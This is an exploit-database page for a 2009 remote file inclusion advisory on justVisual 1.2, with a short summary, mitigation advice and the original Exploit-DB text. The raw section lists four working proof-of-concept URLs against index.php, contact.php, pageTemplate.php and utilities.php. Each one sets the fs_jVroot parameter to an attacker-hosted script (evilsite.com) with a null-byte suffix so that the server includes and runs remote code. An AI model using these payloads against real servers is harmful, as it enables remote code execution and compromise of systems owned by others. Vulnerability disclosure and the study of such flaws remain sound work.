header-logo
Suggest Exploit
vendor:
justVisual
by:
SirGod
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: justVisual
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: N/A
CPE: justVisual
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities

justVisual 1.2 is vulnerable to Remote File Inclusion. The vulnerable code is present in multiple files such as index.php, contact.php, pageTemplate.php and utilities.php. An attacker can exploit this vulnerability by sending a malicious URL in the fs_jVroot parameter.

Mitigation:

Input validation should be performed to prevent malicious URLs from being passed to the application. The application should also be configured to use a whitelist of allowed URLs.
Source

Exploit-DB raw data:

##################################################################################################################
[+] justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
##################################################################################################################

[+] Download : http://www.fh54.de/justVisual/justVisual_1.2.zip

[+] Remote File Inclusion

 - Vulnerable code is everywhere

 - PoC's

   http://127.0.0.1/path/justVisual/sites/site/pages/index.php?fs_jVroot=http://evilsite.com/evilscript.txt%00

   http://127.0.0.1/path/justVisual/sites/test/pages/contact.php?fs_jVroot=http://evilsite.com/evilscript.txt%00

   http://127.0.0.1/path/justVisual/system/pageTemplate.php?fs_jVroot=http://evilsite.com/evilscript.txt%00

   http://127.0.0.1/path/justVisual/system/utilities.php?fs_jVroot=http://evilsite.com/evilscript.txt%00

##################################################################################################################

# milw0rm.com [2009-07-30]

Navigation

Suggest Exploit

Services By CQR